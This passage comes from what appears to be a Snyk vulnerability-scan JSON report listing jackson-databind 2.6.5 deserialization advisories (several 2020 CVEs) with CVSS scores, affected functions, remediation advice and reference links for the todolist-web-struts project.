control the state or the flow of the execution.\n\nJava deserialization issues have been known for years. However, interest in the issue intensified greatly in 2015, when classes that could be abused to achieve remote code execution were found in a [popular library (Apache Commons Collection)](https://snyk.io/vuln/SNYK-JAVA-COMMONSCOLLECTIONS-30078). 
These classes were used in zero-days affecting IBM WebSphere, Oracle WebLogic and many other products.\n\n \nAn attacker just needs to identify a piece of software that has both a vulnerable class on its path, and performs deserialization on untrusted data. Then all they need to do is send the payload into the deserializer, getting the command executed.\n \n\n> Developers put too much trust in Java Object Serialization. Some even de-serialize objects pre-authentication. When deserializing an Object in Java you typically cast it to an expected type, and therefore Java's strict type system will ensure you only get valid object trees. Unfortunately, by the time the type checking happens, platform code has already created and executed significant logic. So, before the final type is checked a lot of code is executed from the readObject() methods of various objects, all of which is out of the developer's control. By combining the readObject() methods of various classes which are available on the classpath of the vulnerable application, an attacker can execute functions (including calling Runtime.exec() to execute local OS commands).\n\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.9.10.8 or higher.\n## References\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2986)\n", + "epssDetails": { + "percentile": "0.66225", + "probability": "0.00262", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2020-35491" + ], + "CWE": [ + "CWE-502" + ] + }, + "packageName": "com.fasterxml.jackson.core:jackson-databind", + "proprietary": false, + "creationTime": "2020-12-18T11:40:53.658144Z", + "functions_new": [ + { + "version": [ + "[,2.10.0.pr1)" + ], + "functionId": { + "className": "com.fasterxml.jackson.databind.ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "alternativeIds": [], + "disclosureTime": "2020-12-18T11:40:13Z", + "exploitDetails": { + "sources": [], + 
"maturityLevels": [ + { + "type": "secondary", + "level": "Not Defined", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Not Defined", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "com.fasterxml.jackson.core", + "artifactId": "jackson-databind" + }, + "publicationTime": "2020-12-18T16:33:11Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:50:57.453912Z", + "socialTrendAlert": false, + "packagePopularityRank": 99, + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "com.fasterxml.jackson.core:jackson-databind@2.6.5" + ], + "upgradePath": [], + "isUpgradable": false, + "isPatchable": false, + "isPinnable": false, + "isRuntime": false, + "name": "com.fasterxml.jackson.core:jackson-databind", + "version": "2.6.5", + "severityWithCritical": "high" + }, + { + "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-1054588", + "title": "Deserialization of Untrusted Data", + "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:P", + "credit": [ + "bu5yer" + ], + "semver": { + "vulnerable": [ + "[2.0.0, 2.9.10.8)" + ] + }, + "exploit": "Proof of Concept", + "fixedIn": [ + "2.9.10.8" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "high", + "cvssScore": 8.1, + "functions": [ + { + "version": [ + "[2.0.0, 2.9.10.8)" + ], + "functionId": { + "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", + "className": "ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "malicious": false, + "isDisputed": false, + "moduleName": "com.fasterxml.jackson.core:jackson-databind", + "references": [ + { + "url": "https://github.com/FasterXML/jackson-databind/issues/2999", + "title": "GitHub Issue" + }, + { + "url": "https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062", + "title": "Medium Post" + }, + { + "url": 
"https://github.com/Al1ex/CVE-2020-35728", + "title": "PoC" + } + ], + "cvssDetails": [ + { + "assigner": "SUSE", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L", + "cvssV3BaseScore": 7.3, + "modificationTime": "2024-03-11T09:49:38.478896Z" + }, + { + "assigner": "NVD", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 8.1, + "modificationTime": "2024-03-11T09:51:01.576739Z" + }, + { + "assigner": "Red Hat", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 8.1, + "modificationTime": "2024-03-11T09:51:23.852735Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:P", + "assigner": "Snyk", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T13:58:43.478254Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L", + "assigner": "SUSE", + "severity": "high", + "baseScore": 7.3, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:49:38.478896Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "NVD", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:51:01.576739Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "Red Hat", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:51:23.852735Z" + } + ], + "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. 
It mishandles the interaction between serialization gadgets and typing, related to `com.oracle.wls.shaded.org.apache.xalan.lib.sql.JNDIConnectionPool` (aka embedded Xalan in `org.glassfish.web/javax.servlet.jsp.jstl`).\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. 
An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. \n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.9.10.8 or higher.\n## References\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2999)\n- [Medium Post](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n- [PoC](https://github.com/Al1ex/CVE-2020-35728)\n", + "epssDetails": { + "percentile": "0.80006", + "probability": "0.00674", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2020-35728" + ], + "CWE": [ + "CWE-502" + ] + }, + "packageName": "com.fasterxml.jackson.core:jackson-databind", + "proprietary": false, + "creationTime": "2020-12-27T14:34:18.527699Z", + "functions_new": [ + { + "version": [ + "[2.0.0, 2.9.10.8)" + ], + "functionId": { + "className": "com.fasterxml.jackson.databind.ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "alternativeIds": [], + "disclosureTime": 
"2020-12-27T14:05:38Z", + "exploitDetails": { + "sources": [ + "Snyk" + ], + "maturityLevels": [ + { + "type": "secondary", + "level": "Proof of Concept", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Proof of Concept", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "com.fasterxml.jackson.core", + "artifactId": "jackson-databind" + }, + "publicationTime": "2020-12-27T17:34:55Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:51:23.852735Z", + "socialTrendAlert": false, + "packagePopularityRank": 99, + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "com.fasterxml.jackson.core:jackson-databind@2.6.5" + ], + "upgradePath": [], + "isUpgradable": false, + "isPatchable": false, + "isPinnable": false, + "isRuntime": false, + "name": "com.fasterxml.jackson.core:jackson-databind", + "version": "2.6.5", + "severityWithCritical": "high" + }, + { + "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-1056414", + "title": "Deserialization of Untrusted Data", + "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", + "credit": [ + "Unknown" + ], + "semver": { + "vulnerable": [ + "[,2.9.10.8)" + ] + }, + "exploit": "Unproven", + "fixedIn": [ + "2.9.10.8" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "high", + "cvssScore": 8.1, + "functions": [ + { + "version": [ + "[,2.9.10.8)" + ], + "functionId": { + "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", + "className": "ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "malicious": false, + "isDisputed": false, + "moduleName": "com.fasterxml.jackson.core:jackson-databind", + "references": [ + { + "url": "https://github.com/FasterXML/jackson-databind/commit/3e8fa3beea49ea62109df9e643c9cb678dabdde1", + "title": "GitHub Commit" + }, + { + "url": 
"https://github.com/FasterXML/jackson-databind/issues/2997", + "title": "GitHub Issue" + }, + { + "url": "https://cowtowncoder.medium.com/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062", + "title": "Medium Article" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 8.1, + "modificationTime": "2024-03-11T09:51:01.748169Z" + }, + { + "assigner": "Red Hat", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 8.1, + "modificationTime": "2024-03-11T09:51:23.768509Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", + "assigner": "Snyk", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T13:59:37.093517Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "NVD", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:51:01.748169Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "Red Hat", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:51:23.768509Z" + } + ], + "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. 
The package mishandles the interaction between serialization gadgets and typing, related to `org.apache.tomcat.dbcp.dbcp.datasources.SharedPoolDataSource`.\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. 
An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. \n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.9.10.8 or higher.\n## References\n- [GitHub Commit](https://github.com/FasterXML/jackson-databind/commit/3e8fa3beea49ea62109df9e643c9cb678dabdde1)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2997)\n- [Medium Article](https://cowtowncoder.medium.com/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n", + "epssDetails": { + "percentile": "0.66225", + "probability": "0.00262", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2020-36187" + ], + "CWE": [ + "CWE-502" + ] + }, + "packageName": "com.fasterxml.jackson.core:jackson-databind", + "proprietary": false, + "creationTime": "2021-01-07T12:47:33.579319Z", + "functions_new": [ + { + "version": [ + "[,2.9.10.8)" + ], + "functionId": { + "className": "com.fasterxml.jackson.databind.ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + 
"alternativeIds": [], + "disclosureTime": "2021-01-07T12:44:41Z", + "exploitDetails": { + "sources": [ + "Snyk" + ], + "maturityLevels": [ + { + "type": "secondary", + "level": "Not Defined", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Proof of Concept", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "com.fasterxml.jackson.core", + "artifactId": "jackson-databind" + }, + "publicationTime": "2021-01-07T16:40:33.970819Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:51:23.768509Z", + "socialTrendAlert": false, + "packagePopularityRank": 99, + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "com.fasterxml.jackson.core:jackson-databind@2.6.5" + ], + "upgradePath": [], + "isUpgradable": false, + "isPatchable": false, + "isPinnable": false, + "isRuntime": false, + "name": "com.fasterxml.jackson.core:jackson-databind", + "version": "2.6.5", + "severityWithCritical": "high" + }, + { + "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-1056416", + "title": "Deserialization of Untrusted Data", + "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:P/RL:U/RC:C", + "credit": [ + "Unknown" + ], + "semver": { + "vulnerable": [ + "[,2.9.10.8)" + ] + }, + "exploit": "Proof of Concept", + "fixedIn": [ + "2.9.10.8" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "high", + "cvssScore": 8.1, + "functions": [ + { + "version": [ + "[,2.9.10.8)" + ], + "functionId": { + "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", + "className": "ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "malicious": false, + "isDisputed": false, + "moduleName": "com.fasterxml.jackson.core:jackson-databind", + "references": [ + { + "url": "https://github.com/FasterXML/jackson-databind/issues/2998", + "title": "GitHub Issue" + }, + { + "url": 
"https://cowtowncoder.medium.com/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062", + "title": "Medium Article" + }, + { + "url": "https://github.com/Al1ex/CVE-2020-36184", + "title": "PoC" + } + ], + "cvssDetails": [ + { + "assigner": "Red Hat", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 8.1, + "modificationTime": "2024-03-11T09:48:47.820867Z" + }, + { + "assigner": "NVD", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 8.1, + "modificationTime": "2024-03-11T09:51:24.700251Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:P/RL:U/RC:C", + "assigner": "Snyk", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T13:59:37.169091Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "Red Hat", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:48:47.820867Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "NVD", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:51:24.700251Z" + } + ], + "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. 
The package mishandles the interaction between serialization gadgets and typing, related to `org.apache.tomcat.dbcp.dbcp2.datasources.PerUserPoolDataSource`.\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. 
An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. \n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.9.10.8 or higher.\n## References\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2998)\n- [Medium Article](https://cowtowncoder.medium.com/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n- [PoC](https://github.com/Al1ex/CVE-2020-36184)\n", + "epssDetails": { + "percentile": "0.66225", + "probability": "0.00262", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2020-36184" + ], + "CWE": [ + "CWE-502" + ] + }, + "packageName": "com.fasterxml.jackson.core:jackson-databind", + "proprietary": false, + "creationTime": "2021-01-07T13:02:15.197495Z", + "functions_new": [ + { + "version": [ + "[,2.9.10.8)" + ], + "functionId": { + "className": "com.fasterxml.jackson.databind.ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "alternativeIds": [], + "disclosureTime": "2021-01-07T13:00:25Z", + 
"exploitDetails": { + "sources": [ + "Snyk" + ], + "maturityLevels": [ + { + "type": "secondary", + "level": "Proof of Concept", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Proof of Concept", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "com.fasterxml.jackson.core", + "artifactId": "jackson-databind" + }, + "publicationTime": "2021-01-07T16:40:33Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:51:24.700251Z", + "socialTrendAlert": false, + "packagePopularityRank": 99, + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "com.fasterxml.jackson.core:jackson-databind@2.6.5" + ], + "upgradePath": [], + "isUpgradable": false, + "isPatchable": false, + "isPinnable": false, + "isRuntime": false, + "name": "com.fasterxml.jackson.core:jackson-databind", + "version": "2.6.5", + "severityWithCritical": "high" + }, + { + "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-1056417", + "title": "Deserialization of Untrusted Data", + "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", + "credit": [ + "Unknown" + ], + "semver": { + "vulnerable": [ + "[,2.9.10.8)" + ] + }, + "exploit": "Unproven", + "fixedIn": [ + "2.9.10.8" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "high", + "cvssScore": 8.1, + "functions": [ + { + "version": [ + "[,2.9.10.8)" + ], + "functionId": { + "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", + "className": "ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "malicious": false, + "isDisputed": false, + "moduleName": "com.fasterxml.jackson.core:jackson-databind", + "references": [ + { + "url": "https://github.com/FasterXML/jackson-databind/issues/2997", + "title": "GitHub Issue" + }, + { + "url": 
"https://cowtowncoder.medium.com/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062", + "title": "Medium Article" + } + ], + "cvssDetails": [ + { + "assigner": "Red Hat", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 8.1, + "modificationTime": "2024-03-11T09:51:23.757857Z" + }, + { + "assigner": "NVD", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 8.1, + "modificationTime": "2024-03-11T09:51:24.695573Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", + "assigner": "Snyk", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T13:59:37.214306Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "Red Hat", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:51:23.757857Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "NVD", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:51:24.695573Z" + } + ], + "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. The package mishandles the interaction between serialization gadgets and typing, related to `org.apache.tomcat.dbcp.dbcp.datasources.PerUserPoolDataSource`.\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. 
The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. 
The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. \n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.9.10.8 or higher.\n## References\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2997)\n- [Medium Article](https://cowtowncoder.medium.com/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n", + "epssDetails": { + "percentile": "0.66225", + "probability": "0.00262", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2020-36186" + ], + "CWE": [ + "CWE-502" + ] + }, + "packageName": "com.fasterxml.jackson.core:jackson-databind", + "proprietary": false, + "creationTime": "2021-01-07T13:05:16.831143Z", + "functions_new": [ + { + "version": [ + "[,2.9.10.8)" + ], + "functionId": { + "className": "com.fasterxml.jackson.databind.ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "alternativeIds": [], + "disclosureTime": "2021-01-07T13:00:26Z", + "exploitDetails": { + "sources": [ + "Snyk" + ], + "maturityLevels": [ + { + "type": "secondary", + "level": "Not Defined", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Proof of Concept", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "com.fasterxml.jackson.core", + "artifactId": "jackson-databind" + }, + "publicationTime": "2021-01-07T16:40:34.206083Z", + "severityBasedOn": "CVSS", + 
